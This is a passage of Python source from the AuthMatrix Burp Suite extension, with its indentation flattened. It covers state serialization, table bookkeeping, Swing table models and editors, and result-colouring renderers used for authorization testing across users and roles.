return "Unidentified"
return None
def getSaveableJson(self):
stateDict = {"version":AUTHMATRIX_VERSION}
stateDict["arrayOfRoles"] = []
for roleEntry in self.arrayOfRoles:
deleted = roleEntry._deleted
stateDict["arrayOfRoles"].append({
"index":roleEntry._index,
"name":roleEntry._name if not deleted else None,
"deleted":deleted,
"column":roleEntry._column if not deleted else None,
"singleUser":roleEntry._singleUser if not deleted else None
})
stateDict["arrayOfUsers"] = []
for userEntry in self.arrayOfUsers:
deleted = userEntry._deleted
stateDict["arrayOfUsers"].append({
"index":userEntry._index,
"name":userEntry._name if not deleted else None,
"roles":userEntry._roles if not deleted else {},
"deleted":deleted,
"enabled":userEntry._enabled,
"tableRow":userEntry._tableRow if not deleted else None,
"cookiesBase64":base64.b64encode(userEntry._cookies.encode("utf-8")) if userEntry._cookies and not deleted else "",
"headersBase64":[base64.b64encode(x.encode("utf-8")) if x else "" for x in userEntry._headers] if not deleted else [],
"chainResults":userEntry._chainResults if not deleted else {}
})
stateDict["arrayOfMessages"] = []
for messageEntry in self.arrayOfMessages:
deleted = messageEntry._deleted
stateDict["arrayOfMessages"].append({
"index":messageEntry._index,
"tableRow":messageEntry._tableRow if not deleted else None,
"requestBase64":base64.b64encode(StringUtil.fromBytes(messageEntry._requestResponse.getRequest()).encode("utf-8")) if not deleted else None,
"host":messageEntry._requestResponse.getHttpService().getHost() if not deleted else None,
"port":messageEntry._requestResponse.getHttpService().getPort() if not deleted else None,
"protocol":messageEntry._requestResponse.getHttpService().getProtocol() if not deleted else None,
"name":messageEntry._name if not deleted else None,
"roles":messageEntry._roles if not deleted else {},
"regexBase64":base64.b64encode(messageEntry._regex.encode("utf-8")) if messageEntry._regex and not deleted else "",
"deleted":deleted,
"enabled":messageEntry._enabled,
"failureRegexMode":messageEntry._failureRegexMode if not deleted else None,
"runBase64ForUserID":{int(x): {
"request": None if not messageEntry._userRuns[x] or not messageEntry._userRuns[x].getRequest() else base64.b64encode(StringUtil.fromBytes(messageEntry._userRuns[x].getRequest()).encode("utf-8")),
"response": None if not messageEntry._userRuns[x] or not messageEntry._userRuns[x].getResponse() else base64.b64encode(StringUtil.fromBytes(messageEntry._userRuns[x].getResponse()).encode("utf-8"))}
for x in messageEntry._userRuns.keys()} if not deleted else {},
"runResultForRoleID":messageEntry._roleResults if not deleted else {}
})
stateDict["arrayOfChains"] = []
for chainEntry in self.arrayOfChains:
deleted = chainEntry._deleted
stateDict["arrayOfChains"].append({
"index":chainEntry._index,
"fromID":chainEntry._fromID if not deleted else None,
"fromRegexBase64":base64.b64encode(chainEntry._fromRegex.encode("utf-8")) if chainEntry._fromRegex and not deleted else "",
"toID":chainEntry._toID if not deleted else None,
"toRegexBase64":base64.b64encode(chainEntry._toRegex.encode("utf-8")) if chainEntry._toRegex and not deleted else "",
"deleted":deleted,
"enabled":chainEntry._enabled,
"tableRow":chainEntry._tableRow if not deleted else None,
"name":chainEntry._name if not deleted else None,
"sourceUser":chainEntry._sourceUser if not deleted else None,
"fromStart":chainEntry._fromStart if not deleted else None,
"fromEnd":chainEntry._fromEnd if not deleted else None,
"toStart":chainEntry._toStart if not deleted else None,
"toEnd":chainEntry._toEnd if not deleted else None,
"transformers":chainEntry._transformers if not deleted else []
})
stateDict["arrayOfChainSources"] = []
for SVEntry in self.arrayOfSVs:
stateDict["arrayOfChainSources"].append({
"name":SVEntry._name,
"userValues":SVEntry._userValues
})
# BUG: this is not using the correct capitalization on booleans after loading legacy states
return json.dumps(stateDict)
def getActiveUserIndexes(self):
return [x._index for x in self.arrayOfUsers if not x.isDeleted()]
def getActiveRoleIndexes(self):
return [x._index for x in self.arrayOfRoles if not x.isDeleted()]
def getActiveSingleUserRoleIndexes(self):
return [x._index for x in self.arrayOfRoles if x.isSingleUser() and not x.isDeleted()]
def getActiveMessageIndexes(self):
return [x._index for x in self.arrayOfMessages if not x.isDeleted()]
def getActiveChainIndexes(self):
return [x._index for x in self.arrayOfChains if not x.isDeleted()]
def getActiveUserCount(self):
ret = self.arrayOfUsers.size()-self.deletedUserCount
assert(ret == len(self.getActiveUserIndexes()))
return ret
def getActiveRoleCount(self):
ret = self.arrayOfRoles.size()-self.deletedRoleCount
assert(ret == len(self.getActiveRoleIndexes()))
return ret
def getActiveMessageCount(self):
ret = self.arrayOfMessages.size()-self.deletedMessageCount
assert(ret == len(self.getActiveMessageIndexes()))
return ret
def getActiveSingleUserRoleCount(self):
return len(self.getActiveSingleUserRoleIndexes())
def getActiveChainCount(self):
return self.arrayOfChains.size()-self.deletedChainCount
def getMessageByRow(self, row):
for messageEntry in [self.arrayOfMessages[i] for i in self.getActiveMessageIndexes()]:
if messageEntry.getTableRow() == row:
return messageEntry
def getUserByRow(self, row):
for userEntry in [self.arrayOfUsers[i] for i in self.getActiveUserIndexes()]:
if userEntry.getTableRow() == row:
return userEntry
def getRoleByColumn(self,column, table):
startingIndex = self.STATIC_MESSAGE_TABLE_COLUMN_COUNT if table == "m" else self.STATIC_USER_TABLE_COLUMN_COUNT+self.headerCount+self.arrayOfSVs.size()
for roleEntry in [self.arrayOfRoles[i] for i in self.getActiveRoleIndexes()]:
if roleEntry.getColumn()+startingIndex == column:
return roleEntry
def getChainByRow(self, row):
for chainEntry in [self.arrayOfChains[i] for i in self.getActiveChainIndexes()]:
if chainEntry.getTableRow() == row:
return chainEntry
def deleteUser(self,userIndex):
self.lock.acquire()
userEntry = self.arrayOfUsers[userIndex]
if userEntry:
userEntry.setDeleted()
self.deletedUserCount += 1
previousRow = userEntry.getTableRow()
for user in [self.arrayOfUsers[i] for i in self.getActiveUserIndexes()]:
if user.getTableRow()>previousRow:
user.setTableRow(user.getTableRow()-1)
# TODO maybe delete SingleUser role too (though it might be worth leaving if the user has boxes checked)
self.lock.release()
def deleteRole(self,roleIndex):
self.lock.acquire()
roleEntry = self.arrayOfRoles[roleIndex]
if roleEntry:
roleEntry.setDeleted()
self.deletedRoleCount += 1
previousColumn = roleEntry.getColumn()
for role in [self.arrayOfRoles[i] for i in self.getActiveRoleIndexes()]:
if role.getColumn()>previousColumn:
role.setColumn(role.getColumn()-1)
self.lock.release()
def deleteMessage(self,messageIndex):
self.lock.acquire()
messageEntry = self.arrayOfMessages[messageIndex]
if messageEntry:
messageEntry.setDeleted()
self.deletedMessageCount += 1
previousRow = messageEntry.getTableRow()
for message in [self.arrayOfMessages[i] for i in self.getActiveMessageIndexes()]:
if message.getTableRow()>previousRow:
message.setTableRow(message.getTableRow()-1)
self.lock.release()
def setToggleForRole(self, messageIndex, roleIndex, enabled):
self.lock.acquire()
messageEntry = self.arrayOfMessages[messageIndex]
messageEntry.setToggleForRoleByIndex(roleIndex, enabled)
self.lock.release()
def deleteChain(self,chainIndex):
self.lock.acquire()
chainEntry = self.arrayOfChains[chainIndex]
if chainEntry:
chainEntry.setDeleted()
self.deletedChainCount += 1
previousRow = chainEntry.getTableRow()
for chain in [self.arrayOfChains[i] for i in self.getActiveChainIndexes()]:
if chain.getTableRow()>previousRow:
chain.setTableRow(chain.getTableRow()-1)
self.lock.release()
def getMessagesInOrderByRow(self):
messages = []
for i in range(self.getActiveMessageCount()):
messages.append(self.getMessageByRow(i))
return messages
def getUsersInOrderByRow(self):
users = []
for i in range(self.getActiveUserCount()):
users.append(self.getUserByRow(i))
return users
def moveMessageToRow(self, fromRow, toRow):
self.lock.acquire()
messages = self.getMessagesInOrderByRow()
if fromRow > toRow:
messages[fromRow].setTableRow(toRow)
for i in range(toRow,fromRow):
messages[i].setTableRow(i+1)
elif toRow > fromRow:
messages[fromRow].setTableRow(toRow-1)
for i in range(fromRow+1,toRow):
messages[i].setTableRow(i-1)
self.lock.release()
def moveUserToRow(self, fromRow, toRow):
self.lock.acquire()
users = self.getUsersInOrderByRow()
if fromRow > toRow:
users[fromRow].setTableRow(toRow)
for i in range(toRow,fromRow):
users[i].setTableRow(i+1)
elif toRow > fromRow:
users[fromRow].setTableRow(toRow-1)
for i in range(fromRow+1,toRow):
users[i].setTableRow(i-1)
self.lock.release()
def clearAllChainResults(self):
for i in self.getActiveUserIndexes():
self.arrayOfUsers[i].clearChainResults()
def getUserByName(self, name):
for i in self.getActiveUserIndexes():
if self.arrayOfUsers[i]._name == name:
return self.arrayOfUsers[i]
def getRoleByName(self, name):
for i in self.getActiveRoleIndexes():
if self.arrayOfRoles[i]._name == name:
return self.arrayOfRoles[i]
def addNewSV(self, name):
if not self.getSVByName(name):
self.lock.acquire()
newSVEntry = SVEntry(name)
self.arrayOfSVs.add(newSVEntry)
self.lock.release()
return newSVEntry
def getSVByName(self, name):
for sv in self.arrayOfSVs:
if sv._name == name:
return sv
return None
def deleteSV(self, index):
if index >=0 and index<self.arrayOfSVs.size():
self.lock.acquire()
self.arrayOfSVs.remove(self.arrayOfSVs[index])
self.lock.release()
def addNewHeader(self):
self.headerCount += 1
for userEntry in [self.arrayOfUsers[i] for i in self.getActiveUserIndexes()]:
userEntry._headers.append("")
assert(len(userEntry._headers)==self.headerCount)
def deleteHeader(self,index):
if index >=0 and index <self.headerCount:
self.headerCount -= 1
for userEntry in [self.arrayOfUsers[i] for i in self.getActiveUserIndexes()]:
userEntry._headers.pop(index)
assert(len(userEntry._headers)==self.headerCount)
return True
return False
##
## Tables and Table Models
##
class UserTableModel(AbstractTableModel):
def __init__(self, extender):
self._extender = extender
self._db = extender._db
def getRowCount(self):
return self._db.getActiveUserCount()
def getColumnCount(self):
return (self._db.STATIC_USER_TABLE_COLUMN_COUNT
+self._db.headerCount
+self._db.arrayOfSVs.size()
+self._db.getActiveRoleCount()
-self._db.getActiveSingleUserRoleCount())
def getColumnName(self, columnIndex):
headerIndex = columnIndex-self._db.STATIC_USER_TABLE_COLUMN_COUNT
svIndex = headerIndex - self._db.headerCount
if columnIndex == 0:
return "User Name"
elif columnIndex == 1:
return "Cookies"
elif headerIndex >=0 and headerIndex<self._db.headerCount:
return "HTTP Header"
elif svIndex >= 0 and svIndex < self._db.arrayOfSVs.size():
return self._db.arrayOfSVs[svIndex]._name
else:
roleEntry = self._db.getRoleByColumn(columnIndex, 'u')
if roleEntry:
return roleEntry._name
return ""
def getValueAt(self, rowIndex, columnIndex):
userEntry = self._db.getUserByRow(rowIndex)
headerIndex = columnIndex-self._db.STATIC_USER_TABLE_COLUMN_COUNT
svIndex = headerIndex - self._db.headerCount
if userEntry:
if columnIndex == 0:
return userEntry._name
elif columnIndex == 1:
return userEntry._cookies
elif headerIndex >=0 and headerIndex<self._db.headerCount:
return userEntry._headers[headerIndex]
elif svIndex >= 0 and svIndex < self._db.arrayOfSVs.size():
return self._db.arrayOfSVs[svIndex].getValueForUserIndex(userEntry._index)
else:
roleEntry = self._db.getRoleByColumn(columnIndex, 'u')
if roleEntry:
roleIndex = roleEntry._index
return roleIndex in userEntry._roles and userEntry._roles[roleIndex]
return ""
def addRow(self, row):
self.fireTableRowsInserted(row,row)
def setValueAt(self, val, row, col):
# NOTE: testing if .locked is ok here since its a manual operation
if self._db.lock.locked():
return
userEntry = self._db.getUserByRow(row)
headerIndex = col-self._db.STATIC_USER_TABLE_COLUMN_COUNT
svIndex = headerIndex - self._db.headerCount
if userEntry:
if col == 0:
# Verify user name does not already exist
if not self._db.getUserByName(val):
# Rename SingleUser role too
roleEntry = self._db.getRoleByName(userEntry._name+" (only)")
if roleEntry:
roleEntry._name = val+" (only)"
userEntry._name = val
elif col == 1:
userEntry._cookies = val
elif headerIndex >=0 and headerIndex<self._db.headerCount:
userEntry._headers[headerIndex] = val
elif svIndex >= 0 and svIndex < self._db.arrayOfSVs.size():
self._db.arrayOfSVs[svIndex].setValueForUserIndex(userEntry._index, val)
else:
roleIndex = self._db.getRoleByColumn(col, 'u')._index
userEntry.addRoleByIndex(roleIndex, val)
self.fireTableCellUpdated(row,col)
# Refresh dropdown menu for Chains and SingleUser Role names for Messages
self._extender._chainTable.redrawTable()
self._extender._messageTable.redrawTable()
# Set checkboxes and role editable
def isCellEditable(self, row, col):
return True
# Create checkboxes
def getColumnClass(self, columnIndex):
if columnIndex < self._db.STATIC_USER_TABLE_COLUMN_COUNT+self._db.headerCount+self._db.arrayOfSVs.size():
return str
else:
return Boolean
class UserTable(JTable):
def __init__(self, model):
self.setModel(model)
return
def redrawTable(self):
# NOTE: this is prob ineffecient but it should catchall for changes to the table
self.getModel().fireTableStructureChanged()
self.getModel().fireTableDataChanged()
# User Name
self.getColumnModel().getColumn(0).setMinWidth(150);
self.getColumnModel().getColumn(0).setMaxWidth(1000);
# Cookie
self.getColumnModel().getColumn(1).setMinWidth(150);
self.getColumnModel().getColumn(1).setMaxWidth(1500);
self.getTableHeader().getDefaultRenderer().setHorizontalAlignment(JLabel.CENTER)
class MessageTableModel(AbstractTableModel):
def __init__(self, extender):
self._extender = extender
self._db = extender._db
def getRowCount(self):
return self._db.getActiveMessageCount()
def getColumnCount(self):
return self._db.getActiveRoleCount()+self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "ID"
elif columnIndex == 1:
return "Request Name"
elif columnIndex == 2:
return "Response Regex"
else:
roleEntry = self._db.getRoleByColumn(columnIndex, 'm')
if roleEntry:
return roleEntry._name
# TODO (0.9): Maybe show the index here to help with constructing state files?
#return roleEntry._name+" (#"+str(roleEntry._index)+")"
return ""
def getValueAt(self, rowIndex, columnIndex):
messageEntry = self._db.getMessageByRow(rowIndex)
if messageEntry:
if columnIndex == 0:
return str(messageEntry._index)
elif columnIndex == 1:
return messageEntry._name
elif columnIndex == 2:
return messageEntry._regex
else:
roleEntry = self._db.getRoleByColumn(columnIndex, 'm')
if roleEntry:
roleIndex = roleEntry._index
return roleIndex in messageEntry._roles and messageEntry._roles[roleIndex]
return ""
def addRow(self, row):
self.fireTableRowsInserted(row,row)
def setValueAt(self, val, row, col):
# NOTE: testing if .locked is ok here since its a manual operation
if self._db.lock.locked():
return
messageEntry = self._db.getMessageByRow(row)
if messageEntry:
if col == self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT-2:
messageEntry._name = val
elif col == self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT-1:
messageEntry._regex = val
# Add this value to the array
if val and val not in self._db.arrayOfRegexes:
self._db.arrayOfRegexes.append(val)
# TODO (0.9): Remove unused Regexes from that list
else:
roleIndex = self._db.getRoleByColumn(col, 'm')._index
messageEntry.addRoleByIndex(roleIndex,val)
self.fireTableCellUpdated(row,col)
# Update the checkbox result colors since there was a change
if col >= self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT-1:
messageEntry.clearResults()
for i in range(self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT, self.getColumnCount()):
self.fireTableCellUpdated(row,i)
# Backup option
# Update entire table since it affects color
# self.fireTableDataChanged()
# Refresh table so that combobox updates
self._extender._messageTable.redrawTable()
# Set checkboxes editable
def isCellEditable(self, row, col):
# Include regex
if col >= self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT-2:
return True
return False
# Create checkboxes
def getColumnClass(self, columnIndex):
if columnIndex < self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT:
return str
else:
return Boolean
class MessageTable(JTable):
def __init__(self, model):
self.setModel(model)
self._extender = model._extender
self._viewerMap = {}
return
def changeSelection(self, row, col, toggle, extend):
# show the message entry for the selected row
selectedMessage = self.getModel()._db.getMessageByRow(row)
# Update messages with any user edits to original requests:
self.updateMessages()
self._extender._tabs.removeAll()
# NOTE: testing if .locked is ok here since its a manual operation
if self.getModel()._db.lock.locked():
# Provide some feedback on a click
self.redrawTable()
return
# Create original Request tab and set default tab to Request
# Then Create test tabs and set the default tab to Response for easy analysis
originalTab = self.createRequestTabs(selectedMessage._requestResponse, True, selectedMessage._index)
originalTab.setSelectedIndex(0)
self._extender._tabs.addTab("Original",originalTab)
for userEntry in self.getModel()._db.getUsersInOrderByRow():
if userEntry._index in selectedMessage._userRuns.keys():
tabname = str(userEntry._name)
self._extender._tabs.addTab(tabname,self.createRequestTabs(selectedMessage._userRuns[userEntry._index]))
JTable.changeSelection(self, row, col, toggle, extend)
return
def createRequestTabs(self, requestResponse, original=False, index=-1):
class RequestResponseTabbedPane(JTabbedPane):
def __init__(self, requestResponse):
self._requestResponse=requestResponse
requestTabs = RequestResponseTabbedPane(requestResponse)
requestViewer = self._extender._callbacks.createMessageEditor(self._extender, original)
responseViewer = self._extender._callbacks.createMessageEditor(self._extender, False)
requestTabs.addTab("Request", requestViewer.getComponent())
requestTabs.addTab("Response", responseViewer.getComponent())
self._extender._callbacks.customizeUiComponent(requestTabs)
requestViewer.setMessage(requestResponse.getRequest(), True)
if requestResponse.getResponse():
responseViewer.setMessage(requestResponse.getResponse(), False)
if not original:
requestTabs.setSelectedIndex(1)
if original and index>=0:
self._viewerMap[index] = requestViewer
return requestTabs
def redrawTable(self):
# NOTE: this is prob ineffecient but it should catchall for changes to the table
self.getModel().fireTableStructureChanged()
self.getModel().fireTableDataChanged()
db = self.getModel()._db
# Regex comboboxes
regexComboBox = JComboBox(db.arrayOfRegexes)
regexComboBox.setEditable(True)
regexComboBoxEditor = DefaultCellEditor(regexComboBox)
self.getColumnModel().getColumn(2).setCellEditor(regexComboBoxEditor)
# Resize
self.getColumnModel().getColumn(0).setMinWidth(30);
self.getColumnModel().getColumn(0).setMaxWidth(45);
self.getColumnModel().getColumn(1).setMinWidth(300);
self.getColumnModel().getColumn(2).setMinWidth(150);
def updateMessages(self):
# For now it sounds like this does not need to be locked, since its only manual operations
for messageIndex in self._viewerMap:
requestViewer = self._viewerMap[messageIndex]
if requestViewer and requestViewer.isMessageModified():
messageEntry = self.getModel()._db.arrayOfMessages[messageIndex]
newMessage = requestViewer.getMessage()
# TODO save the response too? Downside is that the original may not match the response anymore
messageEntry._requestResponse = RequestResponseStored(self._extender,
request=newMessage,
httpService=messageEntry._requestResponse.getHttpService())
self._viewerMap = {}
###
### Chain Tables
###
class ChainTableModel(AbstractTableModel):
def __init__(self, extender):
self._extender = extender
self._db = extender._db
self.chainFromDefault = "All Users (Default)"
self.requestPrefix = "Request: "
self.svPrefix = "SV_"
self.destPrefix = "Request(s): "
def getRowCount(self):
return self._db.getActiveChainCount()
def getColumnCount(self):
# Disable if there arent any chains
if not self._db.getActiveChainCount():
return 1
return self._db.STATIC_CHAIN_TABLE_COLUMN_COUNT
def getColumnName(self, columnIndex):
if self.getColumnCount() == 1:
return ""
if columnIndex == 0:
return "Chain Name"
elif columnIndex == 1:
return "Source"
elif columnIndex == 2:
return "Regex - Extract from HTTP Response"
elif columnIndex == 3:
return "Destination(s)"
elif columnIndex == 4:
return "Regex - Replace into HTTP Request"
elif columnIndex == 5:
return "Use Values From:"
elif columnIndex == 6:
return "Transformers"
return ""
def getValueAt(self, rowIndex, columnIndex):
if self.getColumnCount() == 1:
return ""
chainEntry = self._db.getChainByRow(rowIndex)
if chainEntry:
if columnIndex == 0:
return chainEntry._name
elif columnIndex == 1:
if chainEntry._fromID.isdigit() and int(chainEntry._fromID) in self._db.getActiveMessageIndexes():
return self.requestPrefix+chainEntry._fromID
elif chainEntry._fromID.startswith(self.svPrefix):
# If it's a string, check if its a SV
svEntry = self._db.getSVByName(chainEntry._fromID[len(self.svPrefix):])
if svEntry:
return svEntry._name
else:
return ""
else:
return ""
elif columnIndex == 2:
return chainEntry._fromRegex
elif columnIndex == 3:
return "" if not chainEntry._toID else self.destPrefix+chainEntry._toID
elif columnIndex == 4:
return chainEntry._toRegex
elif columnIndex == 5:
if chainEntry._sourceUser in self._db.getActiveUserIndexes():
return self._db.arrayOfUsers[chainEntry._sourceUser]._name
elif chainEntry._sourceUser == -1:
return self.chainFromDefault
else:
return ""
elif columnIndex == 6:
ret = "x"
for transformer in chainEntry._transformers:
ret = transformer+"("+ret+")"
return "" if ret == "x" else ret
return ""
def addRow(self, row):
self.fireTableRowsInserted(row,row)
def setValueAt(self, val, row, col):
# NOTE: testing if .locked is ok here since its a manual operation
if self._db.lock.locked():
return
chainEntry = self._db.getChainByRow(row)
if chainEntry:
if col == 0:
chainEntry._name = val
elif col == 1:
if val and self.requestPrefix in val and val[len(self.requestPrefix):].isdigit():
chainEntry._fromID = val[len(self.requestPrefix):]
else:
# If it's a string, check if its a SV
svEntry = self._db.getSVByName(val)
if svEntry:
chainEntry._fromID = self.svPrefix+svEntry._name
# Clear fromRegex since its unused
chainEntry._fromRegex = ""
self.fireTableCellUpdated(row,col+1)
else:
chainEntry._fromID = ""
elif col == 2:
chainEntry._fromRegex = val
elif col == 3:
chainEntry._toID = val
elif col == 4:
chainEntry._toRegex = val
elif col == 5:
user = self._db.getUserByName(val)
if user:
chainEntry._sourceUser = user._index
else:
chainEntry._sourceUser = -1
elif col == 6:
if val == "(clear)":
chainEntry.clearTransformers()
else:
chainEntry.addTransformer(val)
self.fireTableCellUpdated(row,col)
def isCellEditable(self, row, col):
if col >= 0:
# Disable Regex when SV
if col == 2 and self._db.getChainByRow(row).getSVName():
return False
else:
return True
return False
def getColumnClass(self, columnIndex):
return str
class ChainTable(JTable):
def __init__(self, model):
self.setModel(model)
return
def redrawTable(self):
# NOTE: this is prob ineffecient but it should catchall for changes to the table
self.getModel().fireTableStructureChanged()
self.getModel().fireTableDataChanged()
if self.getModel().getColumnCount() > 1:
db = self.getModel()._db
# Chain Use Value From comboboxes
users = [self.getModel().chainFromDefault]+[userEntry._name for userEntry in db.getUsersInOrderByRow()]
usersComboBox = JComboBox(users)
usersComboBoxEditor = DefaultCellEditor(usersComboBox)
self.getColumnModel().getColumn(5).setCellEditor(usersComboBoxEditor)
# Tranformers Combobox
transformers = ["(clear)"]+ChainEntry.TransformerList
transformerComboBox = JComboBox(transformers)
transformerComboBoxEditor = DefaultCellEditor(transformerComboBox)
self.getColumnModel().getColumn(6).setCellEditor(transformerComboBoxEditor)
# Source ID comboboxes
sources = [sv._name for sv in db.arrayOfSVs] + [self.getModel().requestPrefix+str(x) for x in db.getActiveMessageIndexes()]
sourcesComboBox = JComboBox(sources)
sourcesComboBoxEditor = DefaultCellEditor(sourcesComboBox)
self.getColumnModel().getColumn(1).setCellEditor(sourcesComboBoxEditor)
destPrefix = self.getModel().destPrefix
# Popup editor for DEST IDs
class DestinationCellEditor(AbstractCellEditor, TableCellEditor, ActionListener):
# https://stackoverflow.com/questions/14153544/jtable-how-to-update-cell-using-custom-editor-by-pop-up-input-dialog-box
self.scrollablePane = JScrollPane()
self.destList = JList()
self.button = JButton()
self.oldVal = ""
def actionPerformed(self,e):
JOptionPane.showMessageDialog(self.button,self.scrollablePane,"Select All Request IDs",JOptionPane.PLAIN_MESSAGE)
self.fireEditingStopped()
def getTableCellEditorComponent(self,table,value,isSelected,rowIndex,vColIndex):
self.oldVal = value if destPrefix not in value else value[len(destPrefix):]
dests = db.getActiveMessageIndexes()
if dests:
self.destList = JList(dests)
self.destList.setVisibleRowCount(10)
self.scrollablePane = JScrollPane(self.destList)
self.button = JButton()
self.button.setBorderPainted(False)
self.button.setOpaque(False)
self.button.setContentAreaFilled(False)
self.button.addActionListener(self)
return self.button
def getCellEditorValue(self):
newValues = self.destList.getSelectedValuesList()
if not newValues:
return self.oldVal
return self.listToRanges(newValues)
# Convert a list of ints into a range string
def listToRanges(self, intList):
ret = []
for val in sorted(intList):
if not ret or ret[-1][-1]+1 != val:
ret.append([val])
else:
ret[-1].append(val)
return ",".join([str(x[0]) if len(x)==1 else str(x[0])+"-"+str(x[-1]) for x in ret])
self.getColumnModel().getColumn(3).setCellEditor(DestinationCellEditor())
# Resize
self.getColumnModel().getColumn(0).setMinWidth(180);
self.getColumnModel().getColumn(0).setMaxWidth(300);
self.getColumnModel().getColumn(1).setMinWidth(115);
self.getColumnModel().getColumn(1).setMaxWidth(175);
self.getColumnModel().getColumn(2).setMinWidth(180);
self.getColumnModel().getColumn(3).setMinWidth(160);
self.getColumnModel().getColumn(3).setMaxWidth(320);
self.getColumnModel().getColumn(4).setMinWidth(180);
self.getColumnModel().getColumn(5).setMinWidth(150);
self.getColumnModel().getColumn(5).setMaxWidth(270);
self.getColumnModel().getColumn(6).setMinWidth(100);
# For color-coding checkboxes in the message table
# Also Grey when not enabled
class SuccessBooleanRenderer(JCheckBox,TableCellRenderer):
def __init__(self, defaultCellRender, db):
self.setOpaque(True)
self.setHorizontalAlignment(JLabel.CENTER)
self._defaultCellRender = defaultCellRender
self._db = db
def getTableCellRendererComponent(self, table, value, isSelected, hasFocus, row, column):
cell = self._defaultCellRender.getTableCellRendererComponent(table, value, isSelected, hasFocus, row, column)
if value:
cell.setSelected(True)
else:
cell.setSelected(False)
if isSelected:
cell.setForeground(table.getSelectionForeground())
cell.setBackground(table.getSelectionBackground())
else:
cell.setForeground(table.getForeground())
cell.setBackground(table.getBackground())
# Color based on results
if column >= self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT:
messageEntry = self._db.getMessageByRow(row)
if messageEntry:
if messageEntry.isEnabled():
roleEntry = self._db.getRoleByColumn(column, 'm')
if roleEntry:
roleIndex = roleEntry._index
if not roleIndex in messageEntry._roleResults:
if isSelected:
cell.setBackground(table.getSelectionBackground())
else:
cell.setBackground(table.getBackground())
else:
# This site was used for generating color blends when selected (option 6 of 12)
# http://meyerweb.com/eric/tools/color-blend/#FFCD81:00CCFF:10:hex
sawExpectedResults = messageEntry._roleResults[roleIndex]
checkboxChecked = messageEntry._roles[roleIndex]
# NOTE: currently no way to detect false positive in failure mode
# failureRegexMode = messageEntry.isFailureRegex()
if sawExpectedResults:
# Set Green if success
if isSelected:
cell.setBackground(Color(0xC8,0xE0,0x51))
else:
cell.setBackground(Color(0x87,0xf7,0x17))
elif checkboxChecked:
# Set Blue if its probably a false positive
if isSelected:
cell.setBackground(Color(0x8B, 0xCD, 0xBA))
else:
cell.setBackground(Color(0x00,0xCC,0xFF))
else:
# Set Red if fail
if isSelected:
cell.setBackground(Color(0xFF, 0x87, 0x51))
else:
cell.setBackground(Color(0xFF, 0x32, 0x17))
else:
if isSelected:
cell.setBackground(Color(0xD1,0xB5,0xA3))
else:
cell.setBackground(Color.GRAY)
return cell
# For color-coding successregex in the message table
# Also Grey when not enabled
class RegexRenderer(JLabel, TableCellRenderer):
def __init__(self, defaultCellRender, db):
self._defaultCellRender = defaultCellRender
self._db = db
def getTableCellRendererComponent(self, table, value, isSelected, hasFocus, row, column):
# Regex color
cell = self._defaultCellRender.getTableCellRendererComponent(table, value, isSelected, hasFocus, row, column)
messageEntry = self._db.getMessageByRow(row)
if column == self._db.STATIC_MESSAGE_TABLE_COLUMN_COUNT-1:
if messageEntry:
if messageEntry.isFailureRegex():
# Set Grey if failure mode
if isSelected:
cell.setBackground(Color(0xD1,0xB5,0xA3))
else:
cell.setBackground(Color(0x99,0x99,0xCC))
else:
if isSelected:
cell.setBackground(table.getSelectionBackground())
else:
cell.setBackground(table.getBackground())
else:
if isSelected:
cell.setBackground(table.getSelectionBackground())
else:
cell.setBackground(table.getBackground())
# Set grey if disabled
if messageEntry and not messageEntry.isEnabled():
if isSelected:
cell.setBackground(Color(0xD1,0xB5,0xA3))
else:
cell.setBackground(Color.GRAY)
return cell
# Default Renderer checking User Table for Enabled
class UserEnabledRenderer(TableCellRenderer):
def __init__(self, defaultCellRender, db):
self._defaultCellRender = defaultCellRender
self._db = db
def getTableCellRendererComponent(self, table, value, isSelected, hasFocus, row, column):
# Regex color
cell = self._defaultCellRender.getTableCellRendererComponent(table, value, isSelected, hasFocus, row, column)
userEntry = self._db.getUserByRow(row)
if userEntry and not userEntry.isEnabled():
if isSelected:
cell.setBackground(Color(0xD1,0xB5,0xA3))
else:
cell.setBackground(Color.GRAY)
elif isSelected:
cell.setBackground(table.getSelectionBackground())
else:
cell.setBackground(table.getBackground())
return cell
# TODO (0.9): combine these classes
# Default Renderer checking Chain Table for Enabled
class ChainEnabledRenderer(TableCellRenderer):
def __init__(self, defaultCellRender, db):
self._defaultCellRender = defaultCellRender
self._db = db
def getTableCellRendererComponent(self, table, value, isSelected, hasFocus, row, column):
# Regex color
cell = self._defaultCellRender.getTableCellRendererComponent(table, value, isSelected, hasFocus, row, column)
chainEntry = self._db.getChainByRow(row)
if chainEntry and not chainEntry.isEnabled():
if isSelected:
cell.setBackground(Color(0xD1,0xB5,0xA3))
else:
cell.setBackground(Color.GRAY)
elif isSelected:
cell.setBackground(table.getSelectionBackground())
else:
cell.setBackground(table.getBackground())
return cell
##
## Classes for Messages, Roles, and Users
##
class MessageEntry:
def __init__(self, index, tableRow, requestResponse, name = "", roles = {}, regex = "", deleted = False, failureRegexMode = False, enabled = True):
self._index = index
self._tableRow = tableRow
self._requestResponse = requestResponse
self._name = name
self._roles = roles.copy()
self._failureRegexMode = failureRegexMode
self._regex = regex
self._deleted = deleted
self._userRuns = {}
self._roleResults = {}
self._enabled = enabled
return
# Role are the index of the db Role array and a bool for whether the checkbox is default enabled or not
def addRoleByIndex(self,roleIndex,enabled=False):
self._roles[roleIndex] = enabled;
def setToggleForRoleByIndex(self, roleIndex, enabled):
self._roles[roleIndex] = enabled;
# Add one Run Result of user x message
def addRunByUserIndex(self,userIndex,requestResponse):
self._userRuns[userIndex] = requestResponse
def setRoleResultByRoleIndex(self, roleIndex, roleResult):
self._roleResults[roleIndex] = roleResult
def setDeleted(self):
self._deleted = True
def isDeleted(self):
return self._deleted
def setTableRow(self, row):
self._tableRow = row
def getTableRow(self):
return self._tableRow
def isFailureRegex(self):
return self._failureRegexMode
def setFailureRegex(self, enabled=True):
self._failureRegexMode = enabled
def clearResults(self):
# Clear Previous Results:
self._roleResults = {}
self._userRuns = {}
def isEnabled(self):
return self._enabled
def toggleEnabled(self):
self._enabled = not self._enabled
class UserEntry:
